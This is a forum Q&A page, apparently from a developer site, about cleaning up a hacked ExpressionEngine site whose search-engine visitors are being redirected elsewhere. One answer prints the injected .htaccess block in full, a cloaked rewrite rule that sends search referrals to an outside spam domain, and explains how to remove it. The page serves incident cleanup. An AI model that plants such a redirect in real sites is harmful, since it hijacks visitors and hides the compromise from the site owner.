CODEWITHSUNDEEP
http-redirectexpressionengine
rhand
rhand

Reputation: 1186

Expression Engine Site hacked - Locate redirect

I have an Expression Engine website of I try to clean up. The database has been given many new users so it seems the database has been hacked / links added. One mayor issue is that the site when clicked in Google is being bypassed. All visitors are being redirected to another website. Here is the search : http://tinyurl.com/72nzutj . First site is the one in question.. The site they are redirected to is http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555 I have been trying to find this redirect in all files and the database, but I have had no luck. It is not a .htaccess redirect, that I have checked and confirmed. But I have not been able to locate a JScript or PHP redirect in the files nor database as of yet.. Probably well hidden because of a base64 or packed encryption. Ideas?

NB no clean database version available

Upvotes: 1

Views: 1068

Answers (2)

rjb
rjb

Reputation: 9116

The redirects are happening from a compromise to your site's .htaccess file, and are only affecting clickthrus from popular search engines. Accessing the site directly has no effect, and helps keep the malware from being detected.

Look for the following code in your site's directory and remove it:

<IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteOptions inherit
    RewriteCond %{HTTP_REFERER} .*(msn|live|altavista|excite|ask|aol|google|mail|bing|yahoo).*$ [NC]
    RewriteRule .* http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555 [R,L]
</IfModule>

You may need to view "hidden files" in your FTP client or use ls -al from the command line to view your .htaccess file.

After you've got the problem fixed, you'll want to make sure you're running the most recent version of ExpressionEngine (EE 1.7.1 or EE 2.3.1 as of this writing), as well as any third-party Add-Ons.

Auditing your server's access_logs may help identify the vulnerability that led to the compromise, and looking at the modification timestamp on the files in your website directory.

A variant of this attack has already affected many WordPress installations, whereby a tiny base64_encoded JavaScript snippet was added just before the closing </body> tag, which lead to visitors being served a malware-infected Adobe Flash Player download.

Upvotes: 1

Henry
Henry

Reputation: 1479

Ask your web host. It seems that incoming visitors with a referrer other than the site are redirected but pasting your website (no referrer) directly into the location bar works.

This question is better off at ServerFault or ITSecurity.

Upvotes: 1

Related Questions